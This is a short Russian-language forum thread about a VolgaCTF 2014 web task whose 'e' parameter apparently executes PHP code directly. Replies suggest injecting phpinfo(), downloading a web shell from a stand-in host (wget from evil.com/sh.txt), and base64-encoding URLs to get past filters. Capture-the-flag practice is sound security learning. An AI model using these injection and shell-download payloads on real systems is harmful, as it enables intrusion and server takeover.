Помогите с поиском флага

Discussion in 'Задания/Квесты/CTF/Конкурсы' started by markelpkr, 30 Mar 2014.

  1. markelpkr

    markelpkr New Member

    Joined:
    16 Mar 2014
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Добрый день античатовцы, помогите пожалуйста найти флаг)
    http://tasks.2014.volgactf.ru:28103/
     
  2. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Какая-то ссылка подозрительная. Не пойду.
     
    _________________________
  3. Toxa33rus

    Toxa33rus Member

    Joined:
    31 Mar 2012
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    Там открывается вот это:
    Notice: Undefined index: e in /var/www/index.php on line 3

    Куда е дели? Третья строка негодует)
     
  4. markelpkr

    markelpkr New Member

    Joined:
    16 Mar 2014
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    есть подсказка /?e=echo pi
     
  5. Fepsis

    Fepsis Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    791
    Likes Received:
    391
    Reputations:
    72

    e=echo pi - выводит результат функции pi()
    http://www.php.su/functions/?pi

    соответственно e=echo functionname выведет результат functionname()

    например http://tasks.2014.volgactf.ru:28103/?e=echo+phpinfo;

    На этом мои знания заканчиваются, да и не честно так ))
     
    1 person likes this.
  6. e17

    e17 Member

    Joined:
    8 Feb 2013
    Messages:
    47
    Likes Received:
    57
    Reputations:
    81
    У тебя на прямую выполняется:

    _ttp://tasks.2014.volgactf.ru:28103/?e=phpinfo();

    классика же:

    Code:
     wget -o test.php http://evil.com/sh.txt
    
     
  7. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391
    или этой функцией http://www.php.net/manual/ru/function.file-get-contents.php

    при необходимости урл можно закодировать в базу64 и дергать в file_get_contents через base64_decode :cool: